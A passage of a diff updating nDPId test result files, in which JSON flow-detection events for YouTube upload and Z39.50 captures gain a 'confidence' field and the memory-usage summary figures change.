 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1511102576863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1511102576863,"pkt":"XEl5dU5q2MuK4S0uCABFAAAoAUhAAIAGcnzAqAIbrNkXb+BsAbtWAw9LcaLjP1AQAQKLbgAAAAAAAAAA"}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1511102576835,"flow_last_seen":1511102576864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1511102576864,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1511102576835,"flow_last_seen":1511102576919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1511102576919,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01406{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1511102576835,"flow_last_seen":1511102576921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4258,"flow_avg_l4_payload_len":532,"midstream":0,"ts_msec":1511102576921,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","server_names":"upload.video.google.com,*.clients.google.com,*.docs.google.com,*.drive.google.com,*.gdata.youtube.com,*.googleapis.com,*.photos.google.com,*.upload.google.com,*.upload.youtube.com,*.youtube-3rd-party.com,upload.google.com,upload.youtube.com,uploads.stage.gdata.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=upload.video.google.com","alpn":"h2,http\/1.1","fingerprint":"EE:3E:32:FB:B1:2E:82:EE:DF:FF:C0:1B:27:CD:BF:D8:8A:CB:BD:63"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1511102576835,"flow_last_seen":1511102576864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1511102576864,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1511102576835,"flow_last_seen":1511102576919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1511102576919,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01432{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1511102576835,"flow_last_seen":1511102576921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4258,"flow_avg_l4_payload_len":532,"midstream":0,"ts_msec":1511102576921,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","server_names":"upload.video.google.com,*.clients.google.com,*.docs.google.com,*.drive.google.com,*.gdata.youtube.com,*.googleapis.com,*.photos.google.com,*.upload.google.com,*.upload.youtube.com,*.youtube-3rd-party.com,upload.google.com,upload.youtube.com,uploads.stage.gdata.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=upload.video.google.com","alpn":"h2,http\/1.1","fingerprint":"EE:3E:32:FB:B1:2E:82:EE:DF:FF:C0:1B:27:CD:BF:D8:8A:CB:BD:63"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1511102578051,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1511102578051,"pkt":"XEl5dU5q2MuK4S0uCABFAAViAV5AAIARbSHAqAIbrNkXb\/MYAbsFTi5hDQjRAddSQpCnUTAzOQGXrkR+sB0UFtwM1LigAQUUQ0hMTxMAAABQQUQAywMAAFNOSQDdAwAAVkVSAOEDAABDQ1MA8QMAAE1TUEP1AwAAVUFJRCQEAABUQ0lEKAQAAFBETUQsBAAAU01ITDAEAABJQ1NMNAQAAENUSU08BAAATk9OUFwEAABNSURTYAQAAFNDTFNkBAAAQ1NDVGQEAABDT1BUaAQAAElSVFRsBAAAQ0ZDV3AEAABTRkNXdAQAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tdXBsb2FkLnlvdXR1YmUuY29tUTAzOQHogWCSkhrofu2AhqIVgpFkAAAAQ2hyb21lLzYyLjAuMzIwMi45NCBXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQAAAAAWDUwOQEAAAAeAAAAdZgRWgAAAAA2Qv7BjobCVSSNm3vqxisDs2cBNiW7yusCpyOOCMJF82QAAAABAAAANVJUT5jAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}}
 02252{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1511102578108,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1511102578108,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADgRtn+s2RdvwKgCGwG78xgFTs8jCAjRAddSQpCnAZLrpBY0DjIhd5jwe0ABH5UBAQD\/\/\/\/1BgCAAVJFSgAIAAAAU1RLADgAAABTTk8AbAAAAFBST0a0AAAAU0NGR1MBAABSUkVKVwEAAFNUVExfAQAAQ1NDVFECAABDUlT\/XwkAAOdd9OCaMJjZHEuQSnBheExXijy9L8yxcLxijUGUgt7VeQLmXHCE0dSCjTwUu4DOXBlw0HTG62CtZtu2a6Ru1X+sH1IA2FJqDRpGVA5MHyMKc7vKtJZUWy6Wq\/FvJH3N94ZirXYSBfeq9Qo8ATBGAiEAppVGAzltTsobgX744i5bBeIqIDO\/YtwFhdblUPMaf9ECIQDgN5eoKUWZEY4A\/yjD3jA5j4ZdDcRSfqhMU1oZUTGdIVNDRkcIAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAVEJLUCAAAABQVUJTQwAAAEtFWFNHAAAAT0JJVE8AAABFWFBZVwAAAEFFU0dDQzIw9lqyAICUa+kwugeWBsbKvkNISURUQjEwIAAAhphHmLi5BO0Bd0EZ92vmXccblzalgzbYj90Qfoq9ozBDMjU1MDAwMDAwMDBAFRRaAAAAAAwAAADNfAIAAAAAAADwAHUApLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BAAAAFfeBYhgQAABAMARjBEAiBdvW4RdrxYmmjeJbc+3jgs5l6RJLipl3aPIQhj9TtUVgIgA9hjkGDtPgI+WyeFtwtRP0uw9dCVeIWw5SDGQbdmUYsAdwDd6x0reg1PpiCLga2BaHB+Lo6dAdVciI09EcTNtuy+zAAAAV94FiCrAAAEAwBIMEYCIQCUIhZCh2zhmqj0uNpoeUCnAI4TO75j9mv1oMYRKX9EbwIhAIVqH7drJ4DDuKcAhaeeCXOoj8EoQkKnHGLbzkyKPDlhAQEDAeiBYJKSGugAAAAAALsLAAB4u4FGwB+tWGtQE1cUJpBXY6I8VdDyFNEgYZOQAr7wiYpWBawlaIsJ2cBCSCJJwEgVWK3A4KNOsVAVxfdjqlClUhXRURAFClYRHasEpKBgRdBILVjtzS6ETSYz9oczmdmc777Onnvu9527WTQrwFy0TRBKTcQLKrp9dm9xz+ylJ4l0NALQ0SJTNhpMGAZIGIUiTgYb8pXrDXnhuTHeCAI35bB6mBzcF\/AwMggEG8\/l8gN4AQK8oOLyArh8PlZQSS0uRWcy5oK8kSqS5YhoKCFpTNbnCo1cbciulQicavSLSfTLCXLA\/GIy2SCmBhjbXCGAaeAd62cA1adjf2xINJs5VuSOLXMcnO6g0xtjxu1zfIrK71z\/\/lBHSmjev8J8r4IzjW36x8zZNOc0+uStj3j5jQFTCvdXObyJDvLf4usWsNFD234IpYyDUMoYbF1AYEyIMUxgprRFy4BQm1YDYkdGbe4DoxE1cRNlsTkiuSRZgUgwczQwlUpYHofIYWI3ezYnVqbQSIiYI5sjEQfx+cECvhGWo1QwPWhGR4JnLMjJFDVvaGa8k59ILpJp1UisCsNHDLsjIhoybIah1TiI3NROUJramkR0FPHFOKJkc0BjBojNewCvTYGkdWaA2nxIipzgswQmGLCKYEiTCUa8hmAgaoIhlxEMpYmhNmwBbogkgDbw4BmdwRG5YU9wALQmwaAKwbrZDaEpiARWYJAhC1RqQKaxhmEsggUaGWzDvnEJ\/3lDO54Eq5NBL2JvMBWod+IRjNRQW4MlI+YJ2HmtQqPWiGE\/uSJWoUhEjKk3iJt1gyUaXPYxnAZwNUeMxRakTVIchroY"}
 02267{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1511102578109,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1511102578109,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADgRtn+s2RdvwKgCGwG78xgFTrFpCAjRAddSQpCnArwHRDvEv6bzYWaHzaQBBSEEhrNWhsBytYq44AhiRo+TwCmwTKGEk42JPpys442NKgutZCyRqQAAtRXqaDF9GcRDYiH0Y\/Fi0MLsDELQGJhY4OvQsShgL0wMj6PF4FCw0EDxBIlYDUjOl0D+boN8rExECEHyX7Bo9gIexu6+BD0Z6jwYVS5xhEFjCAVnb9OEZ+1zI6xu60jhXe7FYiEjXGJWdBF1I+wRdfS48r74X1JeZ567KHa5EJ3pD3ngVQyQUTCSgZUFTVprCgmiU6lxmUwgGRCEl12TIR\/Iu8iryOND7yMz0xaswN6jCztbGOmK9M1HAtnb0p6qNH6hov6O7rqWzJfC2lmeHtZeU6WbjsS8u3ntcJQzOr2oWOwTXcLWes24V6eOPFWo8+TNul2fEFLQ78eM1PXs2XQnqjfDqk3auk2v6+r9pEcxm7ylpmzrihbHoOb9i7fucvoKaS0tCfOsbMqMP3nB9ezFL69FLLtTF+p+dsZl1fPc\/DBpqVvY0e9eHrAZ+VA9+k3JGb\/9upojFbdLGEEHzpW4tGy79WmG8IZ+5InTV7teNKN9mWsYUcLOpqcV59uW1kr1OramoTHz1vv11JzRr2tDd4S\/WkfbF2P7ZGza6rI\/j9Us8WXle5QG\/b6jzfNgyphjqo6oKWSDFJMnAQGwxaXYlmTl4Z1d0i88lvqCkib10ZlL8sf48IBpMSTg8YAY8\/iBmBZzeXzwEwQLgqM\/pux\/6Oa0l01OXX1\/+c6p1ENoy\/3lC8tzQnqdlS7ZoRtbdlT15tR7dEe\/E7HKePNyitQjIpd9cbgeFe\/qfiaMud5KybCv\/DovpHzVwiB95N8TOgZ2djpVNugjWfqwt\/tXNG+oKEpUZF25tdxtEmQz6wFdFS5Lfz91+rFA6vZLi+3IzzZMaO745y137UDe3TWvOGHFc27XdlUmuJypi3zktDjX7YazyO23wuMzY303CxB48w3nqlDPN5G7Ktoywmyvs\/+6kO9uVx38oy25qEe0fpf31qURmsfnntNrHN\/WeyacXdoQapOfb7Pxys\/NacXz+Q0XZq4ta9Z7e19lCXIKCwdG2mlzXAOrircnI\/g3DpRkByLCMjmYFj9jDB9zi+fW\/KMGh8A\/npA75EqgFPvB8xrHUWmTYjFShuyNNEGHqOBhDa5jAvygcyBwwyoCN6wtE0wGiocL7zg1ftXFTvv\/oJAPXPQs8EXNovaf7kkkqasq1vY36F29qncjsStini1pcp7kJZFuH1+dlSGJIedOLC7QMZTl5c4zutP4J9Iv6SmNyouUidqu3dUF52nOcEDd9M6QKlK\/grnxj\/XK1Uve+Vn11FT4bS89njFAcsiu3RvSfjG1ZmrcZ6\/q7\/pYJ88tuiS37l1AWTuTJOy02+fyavOojKMH1wn8z1UfTB\/zTWvuytPdcdnhPtCaI+KIa4F3p3V9yyYFZR1sUJ46vP5m5ZOaqgflXryX78ZeTWvRTfNvvGXb8cOSgXllHhLWeas8yH5iVlRBMCVoVB26EFSw0u7LpTGV75XHW9Nztb6\/wrxD58u4nYzXfW68h\/8B+TYP2QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1511102576835,"flow_last_seen":1511102576954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4704,"flow_avg_l4_payload_len":361,"midstream":0,"ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1511102576794,"flow_last_seen":1511102580286,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":102276,"flow_avg_l4_payload_len":1022,"midstream":0,"ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1511102578051,"flow_last_seen":1511102594936,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":14106,"flow_avg_l4_payload_len":587,"midstream":0,"ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1511102576835,"flow_last_seen":1511102576954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4704,"flow_avg_l4_payload_len":361,"midstream":0,"ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1511102576794,"flow_last_seen":1511102580286,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":102276,"flow_avg_l4_payload_len":1022,"midstream":0,"ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1511102578051,"flow_last_seen":1511102594936,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":14106,"flow_avg_l4_payload_len":587,"midstream":0,"ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}}
 00163{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","total-events-serialized":22}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 137/137
@@ -28,9 +28,9 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4611610 bytes
-~~ total memory freed........: 4611610 bytes
-~~ total allocations/frees...: 99717/99717
+~~ total memory allocated....: 4695907 bytes
+~~ total memory freed........: 4695907 bytes
+~~ total allocations/frees...: 101307/101307
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
 ~~ json string max len.......: 2272 chars
diff --git a/test/results/z3950.pcapng.out b/test/results/z3950.pcapng.out
index 1ad802de9..c4938bc30 100644
--- a/test/results/z3950.pcapng.out
+++ b/test/results/z3950.pcapng.out
@@ -3,14 +3,14 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623680697296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1623680697296,"pkt":"eJS0JASgYDjgxTWgCABFAAA07vtAAH8Gl6\/AqAJkwa7wXeYpANJ85vsBAAAAAIAC+vCgIgAAAgQFtAEDAwgBAQQC"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623680697327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1623680697327,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAADYGz6vBrvBdwKgCZADS5indlQhqfOb7AoAS+vC6GgAAAgQFrAEBBAIBAwMH"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623680697329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1623680697329,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7vxAAH8Gl7rAqAJkwa7wXeYpANJ85vsC3ZUIa1AQAgTz0QAA"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1625070123680,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","ndpi": {"proto":"Z39.50","breed":"Acceptable","category":"Network"}}
